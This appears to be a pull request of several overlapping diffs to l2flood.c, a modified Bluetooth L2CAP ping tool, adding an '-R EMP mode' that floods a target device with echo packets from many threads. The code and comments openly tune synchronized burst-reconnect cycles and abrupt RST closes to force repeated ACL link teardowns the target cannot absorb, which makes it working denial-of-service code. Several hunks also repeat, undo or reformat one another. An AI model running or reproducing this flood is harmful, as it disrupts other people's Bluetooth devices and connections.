### PR TITLE
EMP mode

### DIFF
--- a/l2flood.c
+++ b/l2flood.c
@@ -21,6 +21,7 @@
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
  *
+ *  Modified by Ymsniper: added -R EMP mode (OpenMP only).
  */
 
 #ifdef HAVE_CONFIG_H
@@ -62,7 +63,7 @@ static int delay   = 1;
 static int count   = -1;
 static int timeout = 10;
 static int reverse = 0;
-static int verify  = 0;
+static int verify = 0;
 
 #ifdef _OPENMP
 /* EMP mode flag */
@@ -80,7 +81,7 @@ static float tv2fl(struct timeval tv)
 
 static void stat(int sig)
 {
-	int loss = sent_pkt ? (float)((sent_pkt - recv_pkt) / (sent_pkt / 100.0)) : 0;
+	int loss = sent_pkt ? (float)((sent_pkt-recv_pkt)/(sent_pkt/100.0)) : 0;
 	printf("%d sent, %d received, %d%% loss\n", sent_pkt, recv_pkt, loss);
 	exit(0);
 }
@@ -203,7 +204,7 @@ static void ping_normal(char *svr)
 				goto error;
 			}
 
-			if (!err) {
+			if (!err){
 				printf("Disconnected\n");
 				goto error;
 			}
@@ -335,11 +336,7 @@ static void ping_emp(char *svr)
 	/* Spread packet IDs across threads so they don't all send id=200.
 	 * ident=200, range is 200-254 (55 values). Thread N starts at
 	 * ident + (N % 55) giving each thread a unique starting id. */
-	#ifdef _OPENMP
 	uint8_t id = (uint8_t)(ident + (omp_get_thread_num() % 55));
-	#else
-	uint8_t id = ident;
-	#endif
 
 	while (count == -1 || count-- > 0) {
 		l2cap_cmd_hdr *send_cmd = (l2cap_cmd_hdr *) send_buf;
@@ -486,7 +483,7 @@ static void usage(void)
 	printf("\tl2flood [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-n threads] [-R] [-f] [-r] [-v] <bdaddr>\n");
 	printf("\t-f  Flood ping (delay = 0); default\n");
 	#else
-	printf("\tl2ping [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-R] [-f] [-r] [-v] <bdaddr>\n");
+	printf("\tl2ping [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-f] [-r] [-v] <bdaddr>\n");
 	printf("\t-f  Flood ping (delay = 0)\n");
 	#endif
 	printf("\t-r  Reverse ping\n");

--- a/l2flood.c
+++ b/l2flood.c
@@ -21,23 +21,6 @@
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
  *
- *  Modified by Ymsniper: added -R (EMP) mode. Normal mode (-R absent) is unchanged.
- *
- *  Normal mode fixes:
- *    - sleep(delay) moved outside !lost block; was skipped on packet loss causing
- *      rapid-fire with no inter-ping interval
- *    - sent_pkt/recv_pkt increments wrapped in omp atomic; were data races
- *    - dead free() calls after stat() removed; stat() calls exit() so they
- *      could never execute
- *    - banner wrapped in omp single nowait so only one thread prints it
- *    - printf changed from id-ident to id; id-ident was always 0 on first packet
- *
- *  EMP mode (-R):
- *    Pure send loop, no recv() or poll() for responses. On send failure the
- *    socket is closed and reopened immediately. Uses a burst-and-resync loop
- *    so all threads close and reconnect together, forcing periodic full ACL
- *    teardown instead of staggered L2CAP channel shuffling. Never exits on
- *    its own, only on SIGINT.
  */
 
 #ifdef HAVE_CONFIG_H
@@ -81,8 +64,10 @@ static int timeout = 10;
 static int reverse = 0;
 static int verify  = 0;
 
+#ifdef _OPENMP
 /* EMP mode flag */
 static int reconnect = 0;   /* -R */
+#endif
 
 /* Stats */
 static int sent_pkt = 0;
@@ -90,7 +75,7 @@ static int recv_pkt = 0;
 
 static float tv2fl(struct timeval tv)
 {
-	return (float)(tv.tv_sec * 1000.0) + (float)(tv.tv_usec / 1000.0);
+	return (float)(tv.tv_sec*1000.0) + (float)(tv.tv_usec/1000.0);
 }
 
 static void stat(int sig)
@@ -260,10 +245,10 @@ static void ping_normal(char *svr)
 
 				/* Check payload */
 				if (memcmp(&send_buf[L2CAP_CMD_HDR_SIZE],
-						   &recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
+					&recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
 					fprintf(stderr, "Response payload different.\n");
-					goto error;
-				}
+				goto error;
+					}
 			}
 
 			#ifdef _OPENMP
@@ -297,6 +282,7 @@ static void ping_normal(char *svr)
 	exit(1);
 }
 
+#ifdef _OPENMP
 /* ------------------------------------------------------------
  *  EMP mode (reconnect == 1): fire-and-forget, synchronized burst-reconnect
  *
@@ -349,11 +335,11 @@ static void ping_emp(char *svr)
 	/* Spread packet IDs across threads so they don't all send id=200.
 	 * ident=200, range is 200-254 (55 values). Thread N starts at
 	 * ident + (N % 55) giving each thread a unique starting id. */
-#ifdef _OPENMP
+	#ifdef _OPENMP
 	uint8_t id = (uint8_t)(ident + (omp_get_thread_num() % 55));
-#else
+	#else
 	uint8_t id = ident;
-#endif
+	#endif
 
 	while (count == -1 || count-- > 0) {
 		l2cap_cmd_hdr *send_cmd = (l2cap_cmd_hdr *) send_buf;
@@ -435,7 +421,7 @@ static void ping_emp(char *svr)
 				if (getsockname(sk, (struct sockaddr *)&addr, &optlen) == 0) {
 					ba2str(&addr.l2_bdaddr, str);
 					printf("Ping: %s from %s (data size %d) ...\n",
-					       svr, str, size);
+						   svr, str, size);
 				}
 				printed = 1;
 			}
@@ -454,8 +440,8 @@ static void ping_emp(char *svr)
 			if (send(sk, send_buf, L2CAP_CMD_HDR_SIZE + size, 0) <= 0)
 				break; /* link died mid-burst, fall through to close */
 
-			#pragma omp atomic
-			sent_pkt++;
+				#pragma omp atomic
+				sent_pkt++;
 
 			if (++id > 254) id = ident;
 		}
@@ -475,13 +461,16 @@ static void ping_emp(char *svr)
 	free(send_buf);
 	stat(0);
 }
+#endif /* _OPENMP */
 
 /* Wrapper */
 static void ping(char *svr)
 {
+	#ifdef _OPENMP
 	if (reconnect)
 		ping_emp(svr);
 	else
+		#endif
 		ping_normal(svr);
 }
 
@@ -514,72 +503,73 @@ int main(int argc, char *argv[])
 	#ifdef _OPENMP
 	threads = sysconf(_SC_NPROCESSORS_ONLN);
 	while ((opt = getopt(argc, argv, "i:d:s:c:t:n:Rfrv")) != EOF) {
-	#else
-	while ((opt = getopt(argc, argv, "i:d:s:c:t:Rfrv")) != EOF) {
-	#endif
-		switch (opt) {
-			case 'i':
-				if (!strncasecmp(optarg, "hci", 3))
-					hci_devba(atoi(optarg + 3), &bdaddr);
+		#else
+		while ((opt = getopt(argc, argv, "i:d:s:c:t:frv")) != EOF) {
+			#endif
+			switch (opt) {
+				case 'i':
+					if (!strncasecmp(optarg, "hci", 3))
+						hci_devba(atoi(optarg + 3), &bdaddr);
 				else
 					str2ba(optarg, &bdaddr);
 				break;
 
-			case 'd':
-				delay = atoi(optarg);
-				break;
+				case 'd':
+					delay = atoi(optarg);
+					break;
 
-			case 'f':
-				delay = 0;
-				break;
+				case 'f':
+					delay = 0;
+					break;
 
-			case 'r':
-				reverse = 1;
-				break;
+				case 'r':
+					reverse = 1;
+					break;
 
-			case 'v':
-				verify = 1;
-				break;
+				case 'v':
+					verify = 1;
+					break;
 
-			case 'c':
-				count = atoi(optarg);
-				break;
+				case 'c':
+					count = atoi(optarg);
+					break;
 
-			case 't':
-				timeout = atoi(optarg);
-				break;
+				case 't':
+					timeout = atoi(optarg);
+					break;
 
-			case 's':
-				size = atoi(optarg);
-				break;
+				case 's':
+					size = atoi(optarg);
+					break;
 
-			case 'R':
-				reconnect = 1;
-				break;
+					#ifdef _OPENMP
+				case 'R':
+					reconnect = 1;
+					break;
+					#endif
+					#ifdef _OPENMP
+				case 'n':
+					threads = atoi(optarg);
+					break;
+					#endif
 
-			#ifdef _OPENMP
-			case 'n':
-				threads = atoi(optarg);
-				break;
-			#endif
-
-			default:
-				usage();
-				exit(1);
+				default:
+					usage();
+					exit(1);
+			}
 		}
-	}
 
-	if (!(argc - optind)) {
-		usage();
-		exit(1);
-	}
+		if (!(argc - optind)) {
+			usage();
+			exit(1);
+		}
 
-	#ifdef _OPENMP
-	#pragma omp parallel num_threads(threads)
-	#endif
-	{
-		ping(argv[optind]);
-	}
+		#ifdef _OPENMP
+		#pragma omp parallel num_threads(threads)
+		#endif
+		{
+			ping(argv[optind]);
+		}
 
-	return 0;
-}
+		return 0;
+	}

--- a/l2flood.c
+++ b/l2flood.c
@@ -148,7 +148,9 @@ static void ping_normal(char *svr)
 
 	ba2str(&addr.l2_bdaddr, str);
 	/* Only one thread prints the banner. */
+#ifdef _OPENMP
 	#pragma omp single nowait
+#endif
 	printf("Ping: %s from %s (data size %d) ...\n", svr, str, size);
 
 	/* Initialize send buffer */
@@ -222,14 +224,18 @@ static void ping_normal(char *svr)
 				printf("Peer doesn't support Echo packets\n");
 				goto error;
 			}
-		}
 
+		}
 		/* Both counters are shared across threads; atomic is required. */
+#ifdef _OPENMP
 		#pragma omp atomic
+#endif
 		sent_pkt++;
 
 		if (!lost) {
+#ifdef _OPENMP
 			#pragma omp atomic
+#endif
 			recv_pkt++;
 
 			gettimeofday(&tv_recv, NULL);
@@ -239,27 +245,28 @@ static void ping_normal(char *svr)
 				/* Check payload length */
 				if (recv_cmd->len != size) {
 					fprintf(stderr, "Received %d bytes, expected %d\n",
-							recv_cmd->len, size);
+						   recv_cmd->len, size);
 					goto error;
 				}
 
 				/* Check payload */
 				if (memcmp(&send_buf[L2CAP_CMD_HDR_SIZE],
-					&recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
+						   &recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
 					fprintf(stderr, "Response payload different.\n");
-				goto error;
-					}
+					goto error;
+				}
 			}
 
-			#ifdef _OPENMP
+#ifdef _OPENMP
 			printf("%d bytes from %s id %d time %.2fms thread %d\n", recv_cmd->len, svr,
-				   id, tv2fl(tv_diff), omp_get_thread_num());
-			#else
+				   id - ident, tv2fl(tv_diff), omp_get_thread_num());
+#else
 			printf("%d bytes from %s id %d time %.2fms\n", recv_cmd->len, svr,
-				   id, tv2fl(tv_diff));
-			#endif
+				   id - ident, tv2fl(tv_diff));
+#endif
+
 		} else {
-			printf("no response from %s: id %d\n", svr, id);
+			printf("no response from %s: id %d\n", svr, id - ident);
 		}
 
 		/* Always sleep regardless of whether the packet was lost,
@@ -270,12 +277,12 @@ static void ping_normal(char *svr)
 		if (++id > 254)
 			id = ident;
 	}
-
-	/* stat() prints the summary and calls exit(), so this is the
-	 * normal return path. Cleanup is handled by the error label below. */
 	stat(0);
+	free(send_buf);
+	free(recv_buf);
+	return;
 
-	error:
+error:
 	close(sk);
 	free(send_buf);
 	free(recv_buf);
@@ -436,8 +443,8 @@ static void ping_emp(char *svr)
 			if (send(sk, send_buf, L2CAP_CMD_HDR_SIZE + size, 0) <= 0)
 				break; /* link died mid-burst, fall through to close */
 
-				#pragma omp atomic
-				sent_pkt++;
+			#pragma omp atomic
+			sent_pkt++;
 
 			if (++id > 254) id = ident;
 		}
@@ -462,32 +469,34 @@ static void ping_emp(char *svr)
 /* Wrapper */
 static void ping(char *svr)
 {
-	#ifdef _OPENMP
+#ifdef _OPENMP
 	if (reconnect)
 		ping_emp(svr);
 	else
-		#endif
+#endif
 		ping_normal(svr);
 }
 
 static void usage(void)
 {
-	#ifdef _OPENMP
+#ifdef _OPENMP
 	printf("l2flood - L2CAP flood\n");
-	#else
+#else
 	printf("l2ping - L2CAP ping\n");
-	#endif
+#endif
 	printf("Usage:\n");
-	#ifdef _OPENMP
+#ifdef _OPENMP
 	printf("\tl2flood [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-n threads] [-R] [-f] [-r] [-v] <bdaddr>\n");
 	printf("\t-f  Flood ping (delay = 0); default\n");
-	#else
+#else
 	printf("\tl2ping [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-f] [-r] [-v] <bdaddr>\n");
 	printf("\t-f  Flood ping (delay = 0)\n");
-	#endif
+#endif
 	printf("\t-r  Reverse ping\n");
-	printf("\t-v  Verify request and response payload (normal mode only)\n");
+	printf("\t-v  Verify request and response payload\n");
+#ifdef _OPENMP
 	printf("\t-R  EMP MODE: fire-and-forget, no response waiting, instant reconnect, never exits\n");
+#endif
 }
 
 int main(int argc, char *argv[])
@@ -496,76 +505,77 @@ int main(int argc, char *argv[])
 
 	/* Default options */
 	bacpy(&bdaddr, BDADDR_ANY);
-	#ifdef _OPENMP
+#ifdef _OPENMP
 	threads = sysconf(_SC_NPROCESSORS_ONLN);
-	while ((opt = getopt(argc, argv, "i:d:s:c:t:n:Rfrv")) != EOF) {
-		#else
-		while ((opt = getopt(argc, argv, "i:d:s:c:t:frv")) != EOF) {
-			#endif
-			switch (opt) {
-				case 'i':
-					if (!strncasecmp(optarg, "hci", 3))
-						hci_devba(atoi(optarg + 3), &bdaddr);
-				else
-					str2ba(optarg, &bdaddr);
-				break;
+	while ((opt=getopt(argc,argv,"i:d:s:c:t:n:Rfrv")) != EOF) {
+#else
+	while ((opt=getopt(argc,argv,"i:d:s:c:t:frv")) != EOF) {
+#endif
+		switch(opt) {
+		case 'i':
+			if (!strncasecmp(optarg, "hci", 3))
+				hci_devba(atoi(optarg + 3), &bdaddr);
+			else
+				str2ba(optarg, &bdaddr);
+			break;
 
-				case 'd':
-					delay = atoi(optarg);
-					break;
+		case 'd':
+			delay = atoi(optarg);
+			break;
 
-				case 'f':
-					delay = 0;
-					break;
+		case 'f':
+			/* Kinda flood ping */
+			delay = 0;
+			break;
 
-				case 'r':
-					reverse = 1;
-					break;
+		case 'r':
+			/* Use responses instead of requests */
+			reverse = 1;
+			break;
 
-				case 'v':
-					verify = 1;
-					break;
+		case 'v':
+			verify = 1;
+			break;
 
-				case 'c':
-					count = atoi(optarg);
-					break;
+		case 'c':
+			count = atoi(optarg);
+			break;
 
-				case 't':
-					timeout = atoi(optarg);
-					break;
+		case 't':
+			timeout = atoi(optarg);
+			break;
 
-				case 's':
-					size = atoi(optarg);
-					break;
+		case 's':
+			size = atoi(optarg);
+			break;
 
-					#ifdef _OPENMP
-				case 'R':
-					reconnect = 1;
-					break;
-					#endif
-					#ifdef _OPENMP
-				case 'n':
-					threads = atoi(optarg);
-					break;
-					#endif
+#ifdef _OPENMP
+		case 'R':
+			reconnect = 1;
+			break;
 
-				default:
-					usage();
-					exit(1);
-			}
-		}
+		case 'n':
+			threads = atoi(optarg);
+			break;
+#endif
 
-		if (!(argc - optind)) {
+		default:
 			usage();
 			exit(1);
 		}
-
-		#ifdef _OPENMP
-		#pragma omp parallel num_threads(threads)
-		#endif
-		{
-			ping(argv[optind]);
-		}
-
-		return 0;
 	}
+
+	if (!(argc - optind)) {
+		usage();
+		exit(1);
+	}
+
+#ifdef _OPENMP
+	#pragma omp parallel num_threads(threads)
+#endif
+	{
+		ping(argv[optind]);
+	}
+
+	return 0;
+}

--- a/l2flood.c
+++ b/l2flood.c
@@ -21,18 +21,23 @@
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
  *
- *  Modified by Ymsniper: added -R (EMP) mode – fire-and-forget, no response waiting,
- *  instant reconnect, never exits. Normal mode (-R absent) is unchanged.
+ *  Modified by Ymsniper: added -R (EMP) mode. Normal mode (-R absent) is unchanged.
  *
- *  Fixes:
- *    - Normal mode: sleep(delay) now always runs, not just on success (was causing
- *      rapid-fire when packets were dropped)
- *    - Normal mode: sent_pkt/recv_pkt increments are now atomic under OpenMP
- *    - Normal mode: removed dead free() calls after stat() which calls exit()
- *    - EMP mode: socket set O_NONBLOCK so failed connects abort fast instead of
- *      blocking for the full BT connection timeout
- *    - EMP mode: send() uses 0 so a full socket buffer never stalls
- *      the loop
+ *  Normal mode fixes:
+ *    - sleep(delay) moved outside !lost block; was skipped on packet loss causing
+ *      rapid-fire with no inter-ping interval
+ *    - sent_pkt/recv_pkt increments wrapped in omp atomic; were data races
+ *    - dead free() calls after stat() removed; stat() calls exit() so they
+ *      could never execute
+ *    - banner wrapped in omp single nowait so only one thread prints it
+ *    - printf changed from id-ident to id; id-ident was always 0 on first packet
+ *
+ *  EMP mode (-R):
+ *    Pure send loop, no recv() or poll() for responses. On send failure the
+ *    socket is closed and reopened immediately. Uses a burst-and-resync loop
+ *    so all threads close and reconnect together, forcing periodic full ACL
+ *    teardown instead of staggered L2CAP channel shuffling. Never exits on
+ *    its own, only on SIGINT.
  */
 
 #ifdef HAVE_CONFIG_H
@@ -157,7 +162,7 @@ static void ping_normal(char *svr)
 	}
 
 	ba2str(&addr.l2_bdaddr, str);
-	/* FIX: only one thread prints the banner */
+	/* Only one thread prints the banner. */
 	#pragma omp single nowait
 	printf("Ping: %s from %s (data size %d) ...\n", svr, str, size);
 
@@ -234,7 +239,7 @@ static void ping_normal(char *svr)
 			}
 		}
 
-		/* FIX: both counters protected under OpenMP; were unguarded data races */
+		/* Both counters are shared across threads; atomic is required. */
 		#pragma omp atomic
 		sent_pkt++;
 
@@ -255,10 +260,10 @@ static void ping_normal(char *svr)
 
 				/* Check payload */
 				if (memcmp(&send_buf[L2CAP_CMD_HDR_SIZE],
-					&recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
+						   &recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
 					fprintf(stderr, "Response payload different.\n");
-				goto error;
-					}
+					goto error;
+				}
 			}
 
 			#ifdef _OPENMP
@@ -272,11 +277,8 @@ static void ping_normal(char *svr)
 			printf("no response from %s: id %d\n", svr, id);
 		}
 
-		/*
-		 * FIX: sleep(delay) moved outside the !lost block.
-		 * Previously it only ran on success — dropped packets caused the next
-		 * send to fire immediately with no inter-ping interval.
-		 */
+		/* Always sleep regardless of whether the packet was lost,
+		 * so the inter-ping interval is consistent. */
 		if (delay)
 			sleep(delay);
 
@@ -284,8 +286,8 @@ static void ping_normal(char *svr)
 			id = ident;
 	}
 
-	/* FIX: free() calls removed after stat(); stat() calls exit() so they
-	 * were dead code. stat() handles the final summary and exits cleanly. */
+	/* stat() prints the summary and calls exit(), so this is the
+	 * normal return path. Cleanup is handled by the error label below. */
 	stat(0);
 
 	error:
@@ -296,16 +298,38 @@ static void ping_normal(char *svr)
 }
 
 /* ------------------------------------------------------------
- *  EMP mode (reconnect == 1): fire-and-forget, no response waiting
- *  - Sends as fast as possible
- *  - Reconnects instantly on send failure
- *  - No output until Ctrl+C
+ *  EMP mode (reconnect == 1): fire-and-forget, synchronized burst-reconnect
+ *
+ *  Architecture:
+ *    All OpenMP threads share one ACL link to the target (BT allows only one
+ *    ACL link per remote per local adapter). If threads reconnect independently
+ *    and staggered, they just reopen L2CAP channels on the existing ACL link
+ *    and the link never fully drops -- the target handles it fine.
+ *
+ *    To force regular full ACL teardowns we use a burst-and-resync loop:
+ *      1. All threads connect (simultaneously after each resync)
+ *      2. Each thread sends EMP_BURST_PKTS packets then closes intentionally
+ *      3. EMP_RESYNC_US sleep after close lets all threads reach closed state
+ *         at roughly the same time
+ *      4. All threads reconnect together -- same synchronized pressure as
+ *         startup, every cycle
+ *
+ *    This guarantees periodic full ACL teardown+setup instead of staggered
+ *    L2CAP channel shuffling that the target can absorb without disconnecting.
  * ----------------------------------------------------------- */
+
+/* Packets per connection before forced close. Tuned for a balance between
+ * flood duration per connection and ACL cycling frequency. */
+#define EMP_BURST_PKTS  50
+
+/* Microseconds all threads sleep after closing, so they reach the connect
+ * phase together and hit the target simultaneously on every cycle. */
+#define EMP_RESYNC_US   5000
+
 static void ping_emp(char *svr)
 {
 	struct sigaction sa;
 	unsigned char *send_buf;
-	uint8_t id = ident;
 	int sk = -1;
 	int i, printed = 0;
 	int reuse = 1;
@@ -322,29 +346,32 @@ static void ping_emp(char *svr)
 	for (i = 0; i < size; i++)
 		send_buf[L2CAP_CMD_HDR_SIZE + i] = (i % 40) + 'A';
 
+	/* Spread packet IDs across threads so they don't all send id=200.
+	 * ident=200, range is 200-254 (55 values). Thread N starts at
+	 * ident + (N % 55) giving each thread a unique starting id. */
+#ifdef _OPENMP
+	uint8_t id = (uint8_t)(ident + (omp_get_thread_num() % 55));
+#else
+	uint8_t id = ident;
+#endif
+
 	while (count == -1 || count-- > 0) {
 		l2cap_cmd_hdr *send_cmd = (l2cap_cmd_hdr *) send_buf;
 
-		/* Hammer connect until success */
+		/* --------------------------------------------------
+		 * PHASE 1: CONNECT
+		 * All threads enter this together after each resync.
+		 * -------------------------------------------------- */
 		while (sk < 0) {
-			/*
-			 * 2ms pause between failed attempts.
-			 * BT page scan interval is ~1.28s so spinning faster gains
-			 * nothing — the hardware can't respond faster regardless.
-			 * This cuts per-thread syscall rate from ~10k/s to ~500/s
-			 * and kills the overheating with zero impact on connect speed.
-			 */
-			usleep(2000);
-
+			/* No sleep before first attempt -- startup and post-disconnect
+			 * reconnects are instant. usleep(2000) is added only on each
+			 * failure path below, so the CPU is still protected when the
+			 * target is offline (failed attempts are the hot path). */
 			sk = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP);
-			if (sk < 0) continue;
+			if (sk < 0) { usleep(2000); continue; }
 
-			/*
-			 * FIX: set O_NONBLOCK so connect() returns EINPROGRESS
-			 * immediately instead of blocking for the full BT connection
-			 * timeout when the target is slow/unreachable. We then wait
-			 * at most 1 second via poll before giving up and retrying.
-			 */
+			/* O_NONBLOCK: connect() returns EINPROGRESS immediately
+			 * so we never block for the full kernel BT page timeout. */
 			{
 				int fl = fcntl(sk, F_GETFL, 0);
 				if (fl >= 0)
@@ -352,15 +379,15 @@ static void ping_emp(char *svr)
 			}
 
 			setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
-			setsockopt(sk, SOL_SOCKET, SO_LINGER,    &ling,  sizeof(ling));
+			/* SO_LINGER {1,0}: close() sends RST immediately instead of
+			 * a graceful detach -- abrupt teardown on every cycle. */
+			setsockopt(sk, SOL_SOCKET, SO_LINGER, &ling, sizeof(ling));
 
 			memset(&addr, 0, sizeof(addr));
 			addr.l2_family = AF_BLUETOOTH;
 			bacpy(&addr.l2_bdaddr, &bdaddr);
 			if (bind(sk, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
-				close(sk);
-				sk = -1;
-				continue;
+				close(sk); sk = -1; usleep(2000); continue;
 			}
 
 			memset(&addr, 0, sizeof(addr));
@@ -369,34 +396,36 @@ static void ping_emp(char *svr)
 
 			if (connect(sk, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
 				if (errno == EINPROGRESS) {
-					/*
-					 * Wait up to 1.5s for connection to complete.
-					 * BT paging + ACL setup takes 1-3s on recovery, so
-					 * 1s was too short. 1.5s catches recovery reliably
-					 * while keeping reconnect cycling aggressive.
-					 */
+					/* Poll up to 1.5s for connection completion.
+					 * BT paging + ACL setup can take 1-3s on a
+					 * freshly recovered device. 1.5s catches it
+					 * reliably without stalling the cycle too long. */
 					struct pollfd cpf = {sk, POLLOUT, 0};
 					if (poll(&cpf, 1, 1500) > 0) {
 						int err = 0;
 						socklen_t elen = sizeof(err);
 						getsockopt(sk, SOL_SOCKET, SO_ERROR, &err, &elen);
-						if (err != 0) {
-							close(sk);
-							sk = -1;
-							continue;
-						}
-						/* Successfully connected */
+						if (err != 0) { close(sk); sk = -1; usleep(2000); continue; }
 					} else {
-						/* Timed out — close and retry */
-						close(sk);
-						sk = -1;
-						continue;
+						close(sk); sk = -1; usleep(2000); continue;
 					}
 				} else {
-					close(sk);
-					sk = -1;
-					continue;
+					close(sk); sk = -1; usleep(2000); continue;
 				}
+			}
+
+			/* Connected. Switch back to blocking sends so the kernel
+			 * buffer stays full and send pressure is continuous.
+			 * SO_SNDTIMEO caps each send at 300ms so a dead link is
+			 * detected fast without the thread hanging. */
+			{
+				int fl = fcntl(sk, F_GETFL, 0);
+				if (fl >= 0)
+					fcntl(sk, F_SETFL, fl & ~O_NONBLOCK);
+			}
+			{
+				struct timeval snd_tv = {0, 300000}; /* 300ms */
+				setsockopt(sk, SOL_SOCKET, SO_SNDTIMEO, &snd_tv, sizeof(snd_tv));
 			}
 
 			if (!printed) {
@@ -405,51 +434,44 @@ static void ping_emp(char *svr)
 				memset(&addr, 0, sizeof(addr));
 				if (getsockname(sk, (struct sockaddr *)&addr, &optlen) == 0) {
 					ba2str(&addr.l2_bdaddr, str);
-					printf("Ping: %s from %s (data size %d) ...\n", svr, str, size);
+					printf("Ping: %s from %s (data size %d) ...\n",
+					       svr, str, size);
 				}
 				printed = 1;
 			}
-
-			/* Connected: switch to blocking sends capped at 500ms */
-			{
-				int fl = fcntl(sk, F_GETFL, 0);
-				if (fl >= 0)
-					fcntl(sk, F_SETFL, fl & ~O_NONBLOCK);
-			}
-			{
-				struct timeval snd_tv = {0, 500000}; /* 500ms */
-				setsockopt(sk, SOL_SOCKET, SO_SNDTIMEO, &snd_tv, sizeof(snd_tv));
-			}
 		}
 
-		/* Build command header */
-		send_cmd->ident = id;
-		send_cmd->len   = htobs(size);
-		send_cmd->code  = reverse ? L2CAP_ECHO_RSP : L2CAP_ECHO_REQ;
+		/* --------------------------------------------------
+		 * PHASE 2: BURST
+		 * Send EMP_BURST_PKTS frames then close intentionally.
+		 * Short fixed burst keeps ACL cycling frequent.
+		 * -------------------------------------------------- */
+		for (i = 0; i < EMP_BURST_PKTS; i++) {
+			send_cmd->ident = id;
+			send_cmd->len   = htobs(size);
+			send_cmd->code  = reverse ? L2CAP_ECHO_RSP : L2CAP_ECHO_REQ;
 
-		/*
-		 * Blocking send (flag 0). Kernel buffers fill completely and
-		 * the thread pushes continuously -- maximum sustained pressure.
-		 * SO_SNDTIMEO above caps any block at 500ms for fast dead-link
-		 * detection without spinning.
-		 */
-		if (send(sk, send_buf, L2CAP_CMD_HDR_SIZE + size, 0) <= 0) {
-			close(sk);
-			sk = -1;
-			continue;   /* retry same packet */
+			if (send(sk, send_buf, L2CAP_CMD_HDR_SIZE + size, 0) <= 0)
+				break; /* link died mid-burst, fall through to close */
+
+			#pragma omp atomic
+			sent_pkt++;
+
+			if (++id > 254) id = ident;
 		}
 
-		#pragma omp atomic
-		sent_pkt++;
-
-		if (++id > 254) id = ident;
-
-		if (delay)
-			sleep(delay);
-		/* delay == 0: no sleep — maximum flood */
+		/* --------------------------------------------------
+		 * PHASE 3: FORCED CLOSE + RESYNC
+		 * Always close after each burst regardless of whether
+		 * send failed. The resync sleep gives all threads time
+		 * to also close so the next connect round is synchronized
+		 * -- recreating the full-ACL-teardown pressure every cycle.
+		 * -------------------------------------------------- */
+		close(sk);
+		sk = -1;
+		usleep(EMP_RESYNC_US);
 	}
 
-	if (sk >= 0) close(sk);
 	free(send_buf);
 	stat(0);
 }
@@ -492,72 +514,72 @@ int main(int argc, char *argv[])
 	#ifdef _OPENMP
 	threads = sysconf(_SC_NPROCESSORS_ONLN);
 	while ((opt = getopt(argc, argv, "i:d:s:c:t:n:Rfrv")) != EOF) {
-		#else
-		while ((opt = getopt(argc, argv, "i:d:s:c:t:Rfrv")) != EOF) {
-			#endif
-			switch (opt) {
-				case 'i':
-					if (!strncasecmp(optarg, "hci", 3))
-						hci_devba(atoi(optarg + 3), &bdaddr);
+	#else
+	while ((opt = getopt(argc, argv, "i:d:s:c:t:Rfrv")) != EOF) {
+	#endif
+		switch (opt) {
+			case 'i':
+				if (!strncasecmp(optarg, "hci", 3))
+					hci_devba(atoi(optarg + 3), &bdaddr);
 				else
 					str2ba(optarg, &bdaddr);
 				break;
 
-				case 'd':
-					delay = atoi(optarg);
-					break;
+			case 'd':
+				delay = atoi(optarg);
+				break;
 
-				case 'f':
-					delay = 0;
-					break;
+			case 'f':
+				delay = 0;
+				break;
 
-				case 'r':
-					reverse = 1;
-					break;
+			case 'r':
+				reverse = 1;
+				break;
 
-				case 'v':
-					verify = 1;
-					break;
+			case 'v':
+				verify = 1;
+				break;
 
-				case 'c':
-					count = atoi(optarg);
-					break;
+			case 'c':
+				count = atoi(optarg);
+				break;
 
-				case 't':
-					timeout = atoi(optarg);
-					break;
+			case 't':
+				timeout = atoi(optarg);
+				break;
 
-				case 's':
-					size = atoi(optarg);
-					break;
+			case 's':
+				size = atoi(optarg);
+				break;
 
-				case 'R':
-					reconnect = 1;
-					break;
+			case 'R':
+				reconnect = 1;
+				break;
 
-					#ifdef _OPENMP
-				case 'n':
-					threads = atoi(optarg);
-					break;
-					#endif
+			#ifdef _OPENMP
+			case 'n':
+				threads = atoi(optarg);
+				break;
+			#endif
 
-				default:
-					usage();
-					exit(1);
-			}
+			default:
+				usage();
+				exit(1);
 		}
-
-		if (!(argc - optind)) {
-			usage();
-			exit(1);
-		}
-
-		#ifdef _OPENMP
-		#pragma omp parallel num_threads(threads)
-		#endif
-		{
-			ping(argv[optind]);
-		}
-
-		return 0;
 	}
+
+	if (!(argc - optind)) {
+		usage();
+		exit(1);
+	}
+
+	#ifdef _OPENMP
+	#pragma omp parallel num_threads(threads)
+	#endif
+	{
+		ping(argv[optind]);
+	}
+
+	return 0;
+}

--- a/l2flood.c
+++ b/l2flood.c
@@ -21,7 +21,6 @@
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
  *
- *  Modified by Ymsniper: added -R EMP mode (OpenMP only).
  */
 
 #ifdef HAVE_CONFIG_H

--- a/l2flood.c
+++ b/l2flood.c
@@ -21,8 +21,18 @@
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
  *
- *  Modified by Ymsniper: added -R (EMP) mode ; fire-and-forget, no response waiting,
+ *  Modified by Ymsniper: added -R (EMP) mode – fire-and-forget, no response waiting,
  *  instant reconnect, never exits. Normal mode (-R absent) is unchanged.
+ *
+ *  Fixes:
+ *    - Normal mode: sleep(delay) now always runs, not just on success (was causing
+ *      rapid-fire when packets were dropped)
